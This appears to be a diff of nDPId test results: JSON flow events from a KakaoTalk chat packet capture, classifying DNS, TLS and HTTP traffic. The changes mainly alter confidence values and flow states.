{"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069030083,"flow_last_seen":1430069030119,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.191.1","src_port":61011,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069030083,"flow_last_seen":1430069030115,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":61011,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} 
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022100,"flow_last_seen":1430069022234,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":5929,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} 00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069028075,"flow_last_seen":1430069028075,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"120.28.26.242","dst_ip":"10.24.82.188","src_port":80,"dst_port":34503,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069028075,"flow_last_seen":1430069028075,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"120.28.26.242","dst_ip":"10.24.82.188","src_port":80,"dst_port":34503,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
-00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069031167,"flow_last_seen":1430069031221,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":4017,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"}} -00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1430069030119,"flow_last_seen":1430069030119,"flow_idle_time":140000,"flow_min_l4_payload_len":111,"flow_max_l4_payload_len":111,"flow_tot_l4_payload_len":111,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.191.1","l4_proto":"icmp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069030703,"flow_last_seen":1430069030748,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":74,"flow_tot_l4_payload_len":108,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":24596,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"}} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022252,"flow_last_seen":1430069022295,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":43077,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} -00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069060011,"flow_last_seen":1430069060011,"flow_idle_time":7580000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"216.58.220.174","src_port":49217,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069031167,"flow_last_seen":1430069031221,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":4017,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1430069030119,"flow_last_seen":1430069030119,"flow_idle_time":140000,"flow_min_l4_payload_len":111,"flow_max_l4_payload_len":111,"flow_tot_l4_payload_len":111,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.191.1","l4_proto":"icmp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069030703,"flow_last_seen":1430069030748,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":74,"flow_tot_l4_payload_len":108,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":24596,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"}} 
+00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022252,"flow_last_seen":1430069022295,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":43077,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1430069060011,"flow_last_seen":1430069060011,"flow_idle_time":7580000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"216.58.220.174","src_port":49217,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 00664{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":26,"flow_first_seen":1430069022297,"flow_last_seen":1430069069068,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":589,"flow_tot_l4_payload_len":2142,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"103.246.57.251","src_port":51021,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by 
port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}} 00597{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":26,"flow_first_seen":1430069022297,"flow_last_seen":1430069069068,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":589,"flow_tot_l4_payload_len":2142,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"103.246.57.251","src_port":51021,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00934{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1430069030121,"flow_last_seen":1430069041457,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":5586,"flow_avg_l4_payload_len":206,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":37821,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.KakaoTalk","breed":"Acceptable","category":"Chat"}} 
-00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069031230,"flow_last_seen":1430069031281,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":129,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":14650,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022249,"flow_last_seen":1430069022282,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":29029,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022007,"flow_last_seen":1430069022042,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":122,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":57816,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022252,"flow_last_seen":1430069022295,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":25117,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} -00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069030557,"flow_last_seen":1430069030591,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":6,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"31.13.68.73","dst_ip":"10.24.82.188","src_port":443,"dst_port":47007,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00934{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1430069030121,"flow_last_seen":1430069041457,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":5586,"flow_avg_l4_payload_len":206,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":37821,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": 
{"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.KakaoTalk","breed":"Acceptable","category":"Chat"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069031230,"flow_last_seen":1430069031281,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":129,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":14650,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022249,"flow_last_seen":1430069022282,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":29029,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} 
+00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022007,"flow_last_seen":1430069022042,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":122,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":57816,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022252,"flow_last_seen":1430069022295,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":25117,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} +00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1430069030557,"flow_last_seen":1430069030591,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":6,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"31.13.68.73","dst_ip":"10.24.82.188","src_port":443,"dst_port":47007,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} 00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069049770,"flow_last_seen":1430069049770,"flow_idle_time":7580000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.194.72.188","src_port":34686,"dst_port":5228,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022059,"flow_last_seen":1430069022094,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":12908,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022059,"flow_last_seen":1430069022094,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":12908,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} 00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069035398,"flow_last_seen":1430069048679,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":42332,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069035398,"flow_last_seen":1430069048679,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":42332,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022006,"flow_last_seen":1430069022041,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":127,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":35603,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} -00835{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1430069030751,"flow_last_seen":1430069031522,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6399,"flow_avg_l4_payload_len":336,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45209,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} -00835{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1430069031236,"flow_last_seen":1430069031782,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":7425,"flow_avg_l4_payload_len":256,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45211,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} 
-00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1430069035967,"flow_last_seen":1430069036831,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":5965,"flow_avg_l4_payload_len":213,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45213,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022006,"flow_last_seen":1430069022041,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":127,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":35603,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} 
